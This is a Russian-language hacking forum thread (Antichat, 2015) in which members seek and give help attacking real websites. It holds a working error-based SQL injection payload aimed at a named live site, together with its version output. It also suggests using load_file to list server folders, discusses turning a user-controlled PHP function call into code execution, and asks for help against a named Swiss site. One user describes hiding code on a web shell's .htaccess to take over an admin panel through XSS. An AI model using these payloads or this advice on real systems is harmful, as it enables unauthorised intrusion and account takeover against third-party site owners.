HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.01.2015, 11:35
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от mazaxaka  
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
Если freebsd, то через пма можно узнать.

select load_file('home/user/') покажет все папки в папке user и т.д.
 
Ответить с цитированием

  #2  
Старый 23.01.2015, 01:49
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от cipa21  
никак не могу раскрутить инъекцию
http://stats.chancemotion.ru/get_content.php
пост num=50
Направьте на путь истинный. Спасибо!
error based в limit

Код:
num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
5.5.32
 
Ответить с цитированием

  #3  
Старый 24.01.2015, 22:30
scr1m77
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами: 8089526

Репутация: 2
По умолчанию

есть уязвимый кусок кода:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:

Код:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода?
 
Ответить с цитированием

  #4  
Старый 24.01.2015, 23:16
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от scr1m77  
есть уязвимый кусок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода?
нормально напишите сударь что за функция?
 
Ответить с цитированием

  #5  
Старый 24.01.2015, 23:27
scr1m77
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами: 8089526

Репутация: 2
По умолчанию

Цитата:
Сообщение от UXOR  
нормально напишите сударь что за функция?
вроде предельно ясно написано, могу передавать произвольное значение. Например:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
 
Ответить с цитированием

  #6  
Старый 25.01.2015, 00:17
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

Цитата:
Сообщение от scr1m77  
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
 
Ответить с цитированием

  #7  
Старый 27.01.2015, 15:56
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04

Можно чё нить с этим сделать?

Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
 
Ответить с цитированием

  #8  
Старый 27.01.2015, 19:42
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
 
Ответить с цитированием

  #9  
Старый 27.01.2015, 21:24
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.

Цитата:
Сообщение от Unknowhacker  
сканеры могут обнаружить этот код?!
Конечно могут.
 
Ответить с цитированием

  #10  
Старый 28.01.2015, 00:34
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

Цитата:
Сообщение от XAMEHA  
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.